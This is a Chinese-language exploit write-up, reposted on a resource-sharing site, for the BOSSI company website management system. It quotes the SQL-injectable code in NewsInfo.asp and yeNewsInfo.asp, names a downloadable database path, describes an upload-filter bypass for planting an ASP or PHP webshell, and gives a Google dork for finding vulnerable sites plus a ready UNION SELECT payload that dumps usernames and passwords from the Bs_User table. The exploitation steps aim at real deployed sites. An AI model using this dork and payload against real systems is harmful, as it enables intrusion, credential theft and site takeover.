BOSSI 公司企业网站管理系统注入&上传漏洞利用
让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版权、公司邮局、收藏等资料可以在后台的"公司资料"里管理
—————————————————-漏洞一:注入漏洞,
漏洞页面:NewsInfo.asp,
漏洞代码:if not isEmpty(request.QueryString("id")) thenid=request.QueryString("id")elseid=1end if
Set rs = Server.CreateObject("ADODB.Recordset")rs.Open "Select * From Conews where id="&id, conn,3,3\’纪录访问次数rs("counter")=rs("counter")+1rs.updatenCounter=rs("counter")
id变量未处理直接代入sql查询,可注射,用啊d就行
页面二:yeNewsInfo.asp
漏洞代码:<%if not isEmpty(request.QueryString("id")) thenid=request.QueryString("id")elseid=1end if
Set rs = Server.CreateObject("ADODB.Recordset")rs.Open "Select * From Yenews where id="&id, conn,3,3\’纪录访问次数rs("counter")=rs("counter")+1rs.updatenCounter=rs("counter")\’定义内容content=ubbcode(rs("content"))%>
原理同上,可注入。
漏洞二:数据库下载漏洞
数据库地址:Database/DataShop.mdb
为建立放下载表,可任意下载!
漏洞三:上传漏洞
漏洞页面:upfile.asp ,upfilea.asp
问题代码:fileExt=lcase(file.FileExt) Forumupload=split(UpFileType,"|") for i=0 to ubound(Forumupload) if fileEXT=trim(Forumupload(i)) then EnableUpload=true exit for end if next if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then EnableUpload=false end if if EnableUpload=false then msg="这种文件类型不允许上传!\\n\\n只允许上传这几种文件类型:" & UpFileType founderr=true end if
和那个良精的上传漏洞一样,不知道是谁抄谁的代码了!注册用户,本地上传php的大马或者加空格过滤上传asp大马,具体方法我就不说了,在浅析良精企业网站管理程序一文中提到过了!不再赘述!
漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id
注入语句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User
或者啊d:需要手动添加表段:Bs_User
数据库漏洞利用:
挖掘机:关键字:inurl:yeNewsInfo.asp?Id
后缀:Database/DataShop.mdb
关于上传漏洞的利用我就不演示了,可参照 浅析良精企业网站管理系统漏洞 一文。
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » BOSSI 公司企业网站管理系统注入&上传漏洞利用
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html